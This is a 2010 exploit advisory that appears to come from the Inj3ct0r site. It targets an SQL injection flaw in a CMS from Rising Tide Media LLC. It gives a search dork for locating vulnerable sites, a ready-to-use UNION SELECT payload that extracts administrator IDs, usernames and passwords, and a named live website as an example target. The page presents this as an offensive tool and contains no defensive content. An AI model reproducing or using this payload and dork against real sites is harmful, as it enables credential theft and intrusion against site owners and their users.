Rising Tide Media LLC CMS SQL Injection Vulnerability
Posted on 26 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Rising Tide Media LLC CMS SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== Rising Tide Media LLC CMS SQL Injection Vulnerability ===================================================== # * EDB-ID: # * CVE: # * OSVDB-ID: # * Author: Dr.0rYX and Cr3w-DZ # * Published: # * Verified: # * Exploit Code: # * Vulnerable App: # # **************************************************************************************************** # * _______ ___________.__ ___________ .__ * # * ____ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * # * / / /_ \_ __ | | | | ______ \__ | __) \_ __ |/ ___\__ * # * | | \_/ | /| | | Y /_____/ / __ \_| | | / \___ / __ \_ * # * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * # * / / / / / / / * # * .__ __ __ * # * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * # * / ___// __ \_/ ___| | \_ __ __< | | __/ __ \__ / * # * \___ \ ___/ \___| | /| | / || | \___ | | | ___/ / __ | Y Y * # * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * # * / / / / / / / * # * Pr!v8 Expl0iT AND t00l ** * # * ALGERIAN HACKERS * # *********************************- NORTH-AFRICA SECURITY TEAM -************************************* # # [!] Rising Tide Media LLC CMS SQL Injection Vulnerability # [!] Author : Dr.0rYX and Cr3w-DZ # [!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> # # ***************************************************************************/ # # [ Software Information ] # # [+] Vendor : http://www.risingtidemedia.com/ # [+] script : Rising Tide Media LLC CMS # [+] Download : http://www.risingtidemedia.com/contact.html (sell script ) # [+] Vulnerability : SQL injection # [+] Dork : inurl:"report_content.php?report_id=" # # **************************************************************************/ # [ Vulnerable File ] # # http://server/report_content.php?report_id=[N.A.S.T ] # # # [ Exploit ] # # http://server/report_content.php?report_id=-1+union+select+1,2,3,concat(id,0x3a,user_name,0x3a,user_password),5,6,7+from+administrators # # # [ ExAMPLE ] # # http://www.justifiedcharters.com/report_content.php?report_id=-189+union+select+1,2,3,concat%28id,0x3a,user_name,0x3a,user_password%29,5,6,7+from+administrators # # [ GReet ] # # [+] :claw , exploit-db.com , ALL HACKERS MUSLIMS # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
